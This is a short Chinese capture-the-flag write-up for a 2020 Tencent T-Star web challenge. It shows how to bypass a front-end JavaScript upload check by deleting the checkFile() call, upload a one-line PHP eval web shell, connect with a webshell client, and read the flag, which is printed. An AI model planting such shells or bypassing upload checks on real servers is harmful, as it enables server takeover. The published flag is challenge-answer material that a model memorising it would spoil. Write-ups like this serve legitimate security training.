跳转至
2020 | 腾讯犀牛鸟网络安全 | T-Star-高校挑战赛 | Web

文件上传 JS 绕过

解题思路

  • 题目需要上传一个webshell到服务器,但是前端有 JS 校验,导致只能上传图片
    IMG ONLY
    • hack.php 
      1
2
      <?php @eval($_POST['hack']);?>
# hack 为菜刀连接使用的密码
  • 使用开发者工具删除onsubmit中调用checkFile()函数的过程,然后就可以直接上传 PHP 文件
    前端修改
  • 打开菜刀,添加 SHELL
    连接服务器
  • 连接后,在www目录下可以看到名为key的文件
    检索目录
  • 内容即为 FLAG:key{K735c9f0D7ddc3b9}
最后更新: 2021年12月13日 11:23:59
Contributors: YanhuiJessica

评论